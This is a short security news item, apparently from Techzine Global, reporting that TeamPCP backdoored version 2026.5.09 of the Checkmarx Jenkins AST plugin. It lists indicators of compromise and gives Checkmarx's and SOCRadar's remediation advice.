"A tampered version of the Checkmarx Jenkins AST plugin has appeared in the Jenkins Marketplace. The attack has been assigned a CVE identifier (CVE-2026-33634) with a CVSS score of 9.4. Checkmarx has confirmed the incident and advises users to take immediate action. The hacker group TeamPCP renamed the Checkmarx Jenkins AST plugin's GitHub repository to "Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now." The repository description was changed to: "Checkmarx fails to rotate secrets again. with love - TeamPCP." The group then backdoored the plugin release itself."
"Jenkins instances that installed version 2026.5.09 are therefore running a compromised plugin. The malware has a Dune theme. Repositories on the compromised cx-plugins-releases account have names like kralizec-navigator-709 and mentat-navigator-124, all with the description "A Mini Shai-Hulud has Appeared." This is not the first time TeamPCP has targeted Checkmarx. In March 2026, the group had already compromised checkmarx/ast-github-action and checkmarx/kics-github-action."
"Checkmarx recommends using only version 2.0.13-829.vc72453fa_1c16, published on December 17, 2025. Anyone who has installed version 2026.5.09 must rotate all secrets that were visible to the Jenkins runner: GitHub tokens, cloud credentials (AWS/GCP/Azure), Kubernetes configurations, Docker credentials, and SSH keys. In addition, SOCRadar recommends checking Jenkins build logs for outbound traffic to unknown domains and searching for Dune-related repository names in GitHub organizations."
"During that same campaign, more than 66 npm packages were compromised, and at least 1,000 enterprise SaaS environments were potentially exposed. Trivy and LiteLLM were also targeted. Previous findings revealed how these supply chain attacks target developer endpoints, with attackers specifically hunting for cloud credentials, npm publication tokens, and SSH keys."
A tampered Checkmarx Jenkins AST plugin was published in the Jenkins Marketplace and assigned CVE-2026-33634 with a CVSS score of 9.4. The attacker renamed the plugin’s GitHub repository and changed its description, then backdoored the plugin release. Jenkins instances that installed version 2026.5.09 are running a compromised plugin. The malware uses a Dune theme and appears in repositories under the cx-plugins-releases account with names such as kralizec-navigator-709 and mentat-navigator-124. Checkmarx recommends using only version 2.0.13-829.vc72453fa_1c16 published on December 17, 2025. Users who installed 2026.5.09 should rotate all secrets visible to the Jenkins runner, including GitHub tokens, cloud credentials, Kubernetes configurations, Docker credentials, and SSH keys, and should review Jenkins build logs for outbound traffic to unknown domains and search for Dune-related repository names.
#supply-chain-attack #jenkins-plugin-compromise #credential-rotation #malware-backdoor #cve-2026-33634
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]